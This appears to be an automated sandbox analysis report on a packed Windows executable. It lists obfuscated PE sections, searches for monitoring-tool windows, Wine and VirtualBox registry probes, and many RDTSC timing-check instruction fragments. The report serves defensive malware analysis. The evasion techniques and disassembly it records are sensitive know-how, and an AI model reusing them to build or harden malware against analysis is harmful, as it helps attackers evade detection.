              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1849856 > 1048576
              Source: file.exeStatic PE information: Raw size of lupaymij is bigger than: 0x100000 < 0x199800
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2471516466.00000000082C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2566601730.00000000061B2000.00000040.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lupaymij:EW;pxtqjdhl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lupaymij:EW;pxtqjdhl:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1cfa28 should be: 0x1cca99
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: lupaymij
              Source: file.exeStatic PE information: section name: pxtqjdhl
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061BEE67 push 255CB8D5h; mov dword ptr [esp], edi0_2_061BEE84
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C108B push ebp; mov dword ptr [esp], 07DB5853h0_2_061C1092
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C0E3D push ebx; mov dword ptr [esp], edi0_2_061C0E43
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C0E3D push 3BFB31E1h; mov dword ptr [esp], eax0_2_061C2DE6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C0E3D push esi; mov dword ptr [esp], ebx0_2_061C45F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C0E3D push ecx; mov dword ptr [esp], 77DFBF02h0_2_061C4B1F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061BE632 push ebp; mov dword ptr [esp], eax0_2_061BEA73
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061BE632 push ebp; mov dword ptr [esp], 71C3EF12h0_2_061BEAFC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061BEE21 push ebx; mov dword ptr [esp], edx0_2_061BEE4E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C0E21 push esi; mov dword ptr [esp], ebx0_2_061C45F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C0E21 push ecx; mov dword ptr [esp], 77DFBF02h0_2_061C4B1F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C2E57 push ecx; mov dword ptr [esp], esi0_2_061C5976
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061BC642 push ecx; mov dword ptr [esp], ebp0_2_061BC658
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FBE42 push edx; mov dword ptr [esp], esi0_2_061FC6DF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FBE42 push ebx; mov dword ptr [esp], 1F3CF5C1h0_2_061FC6E3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FBE42 push ebx; mov dword ptr [esp], eax0_2_061FC80B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FBE42 push 448BCAF1h; mov dword ptr [esp], ebp0_2_061FC885
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FBE42 push ebp; mov dword ptr [esp], 66CFD5CEh0_2_061FC8BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FBE42 push edx; mov dword ptr [esp], eax0_2_061FC9A1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FBE42 push 16AD2BA6h; mov dword ptr [esp], edi0_2_061FC9D3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C867F push 066075E5h; mov dword ptr [esp], ebx0_2_061C8AE7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C867F push 02925112h; mov dword ptr [esp], edx0_2_061C8B96
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C867F push esi; mov dword ptr [esp], ebp0_2_061C8BAE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C867F push edi; mov dword ptr [esp], ecx0_2_061C8C23
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C867F push edi; mov dword ptr [esp], ebp0_2_061C8C34
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C867F push eax; mov dword ptr [esp], ebp0_2_061C8C71
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C867F push ebx; mov dword ptr [esp], eax0_2_061C8C8B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061BE660 push 1F84F715h; mov dword ptr [esp], esp0_2_061BF5E8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061BE69F push 6581EABFh; mov dword ptr [esp], esi0_2_061BE6A5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C3699 push esi; mov dword ptr [esp], ebx0_2_061C45F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C3699 push edx; mov dword ptr [esp], esi0_2_061C495D
              Source: file.exeStatic PE information: section name: entropy: 7.975956934905569
              Source: file.exeStatic PE information: section name: lupaymij entropy: 7.953593367647339

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1ECAF8 second address: 1ECAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1ECAFC second address: 1ECB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1ECB00 second address: 1ECB0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1ECB0A second address: 1ECB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1ECB0E second address: 1ECB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36AC0C second address: 36AC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F3B605222D2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F3B605222D5h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36AC41 second address: 36AC46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36B02A second address: 36B030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36B030 second address: 36B054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE51Fh 0x00000009 popad 0x0000000a jmp 00007F3B60BFE520h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36B054 second address: 36B0A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F3B605222D2h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007F3B605222E1h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F3B605222D9h 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 jmp 00007F3B605222CDh 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36B0A3 second address: 36B0A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D0E8 second address: 36D0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3B605222C6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D0F3 second address: 36D145 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F3B60BFE516h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov esi, dword ptr [ebp+122D385Ch] 0x00000015 push 00000000h 0x00000017 jmp 00007F3B60BFE523h 0x0000001c sub dword ptr [ebp+122D1AA6h], ebx 0x00000022 call 00007F3B60BFE519h 0x00000027 js 00007F3B60BFE51Eh 0x0000002d ja 00007F3B60BFE518h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 js 00007F3B60BFE518h 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D145 second address: 36D14A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D14A second address: 36D16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B60BFE526h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D282 second address: 36D34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B605222D6h 0x00000009 popad 0x0000000a jnl 00007F3B605222D9h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 mov di, E900h 0x00000018 push 00000000h 0x0000001a call 00007F3B605222D8h 0x0000001f jne 00007F3B605222C8h 0x00000025 mov cl, bl 0x00000027 pop edi 0x00000028 push DD03D763h 0x0000002d jmp 00007F3B605222D2h 0x00000032 add dword ptr [esp], 22FC291Dh 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F3B605222C8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 xor edx, 35B251CFh 0x00000059 push 00000003h 0x0000005b xor si, E24Dh 0x00000060 push 00000000h 0x00000062 mov dword ptr [ebp+122D1BF9h], eax 0x00000068 push 00000003h 0x0000006a mov esi, edi 0x0000006c push 876539E5h 0x00000071 pushad 0x00000072 jnc 00007F3B605222C8h 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37EEA4 second address: 37EEA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37EEA9 second address: 37EEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F3B605222C8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35328C second address: 3532B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE51Ch 0x00000009 jmp 00007F3B60BFE529h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3532B9 second address: 3532C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3532C6 second address: 3532CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3532CA second address: 3532D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38B7B3 second address: 38B7D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F3B60BFE523h 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38B7D0 second address: 38B7D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38B7D5 second address: 38B7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3B60BFE516h 0x0000000a jmp 00007F3B60BFE51Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38B7EC second address: 38B821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F3B605222D0h 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3B605222D8h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BCD6 second address: 38BCDC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BCDC second address: 38BCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BE46 second address: 38BE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE523h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38C255 second address: 38C269 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3B605222C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F3B605222CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38C40A second address: 38C432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B60BFE51Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B60BFE526h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359F3D second address: 359F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B605222D4h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359F56 second address: 359F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359F5C second address: 359F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38C592 second address: 38C59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38C59C second address: 38C5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38C5A0 second address: 38C5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38D303 second address: 38D30A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39105A second address: 39106D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jc 00007F3B60BFE516h 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39106D second address: 391072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35B9EF second address: 35B9F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35B9F3 second address: 35BA01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F3B605222C8h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BA01 second address: 35BA26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F3B60BFE51Fh 0x0000000a jmp 00007F3B60BFE51Dh 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3946E1 second address: 3946E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3931A5 second address: 3931A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3931A9 second address: 3931AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3982BE second address: 3982C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39814E second address: 398183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3B605222C6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d jmp 00007F3B605222D3h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 push edi 0x00000015 jmp 00007F3B605222D0h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BD96 second address: 39BD9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BD9C second address: 39BDA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BDA2 second address: 39BDA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BDA9 second address: 39BDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnc 00007F3B605222CAh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F3B605222D1h 0x00000014 jnl 00007F3B605222C6h 0x0000001a jl 00007F3B605222C6h 0x00000020 popad 0x00000021 jmp 00007F3B605222CAh 0x00000026 push eax 0x00000027 push edx 0x00000028 js 00007F3B605222C6h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3625D5 second address: 3625E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C475 second address: 39C47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C56A second address: 39C581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007F3B60BFE518h 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C581 second address: 39C587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C587 second address: 39C58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C8A6 second address: 39C8B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3B605222C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CAA1 second address: 39CAA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CC82 second address: 39CCA8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3B605222C8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F3B605222D7h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CCA8 second address: 39CCBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B60BFE51Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CCBB second address: 39CCBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CD51 second address: 39CD67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B60BFE522h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39D2BD second address: 39D30B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push ecx 0x0000000c jmp 00007F3B605222CBh 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jmp 00007F3B605222CAh 0x0000001c jmp 00007F3B605222D0h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F3B605222CFh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39D3C2 second address: 39D3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39D3C6 second address: 39D3CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39E5BF second address: 39E5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39F0F5 second address: 39F0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A01D6 second address: 3A01F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE529h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1CE2 second address: 3A1CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
